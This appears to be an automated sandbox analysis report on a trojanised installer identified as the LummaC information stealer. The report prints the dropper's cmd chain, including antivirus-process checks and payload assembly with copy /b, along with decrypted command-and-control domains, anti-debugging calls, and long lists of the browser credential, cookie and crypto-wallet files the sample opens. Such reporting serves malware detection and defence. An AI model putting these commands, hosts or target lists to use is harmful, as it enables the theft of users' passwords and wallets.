Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00EAF4FF BlockInput,

13_2_00EAF4FF

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E3338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

13_2_00E3338B

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E55058 mov eax, dword ptr fs:[00000030h]

13_2_00E55058

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E920AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

13_2_00E920AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E62992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00E62992
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E50BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00E50BAF
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E50D45 SetUnhandledExceptionFilter,	13_2_00E50D45
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E50F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00E50F91

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: finickypwk.lat
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shoefeatthe.lat
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: savorraiykj.lat
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: kickykiduz.lat
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: miniatureyu.lat
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: leggelatez.lat
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: washyceehsu.lat
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bloodyswif.lat
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: goldyhanders.cyou

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

13_2_00E91B4D

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E3338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

13_2_00E3338B

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E9BBED SendInput,keybd_event,

13_2_00E9BBED

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E9ECD0 mouse_event,

13_2_00E9ECD0

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224553	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Choosing	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Readily" Departure	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many z	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\224553\Luther.com Luther.com z	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E914AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

13_2_00E914AE

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E91FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

13_2_00E91FB0

Source: Luther.com, 0000000D.00000003.2221201231.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmp, Luther.com.2.dr, Page.9.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Luther.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E50A08 cpuid

13_2_00E50A08

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E8E5F4 GetLocalTime,

13_2_00E8E5F4

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E8E652 GetUserNameW,

13_2_00E8E652

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E6BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

13_2_00E6BCD2

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Luther.com, 0000000D.00000002.4497541378.00000000038BE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Luther.com PID: 7696, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 71520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"%3
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 71520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"%3
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Luther.com, 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,*3

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
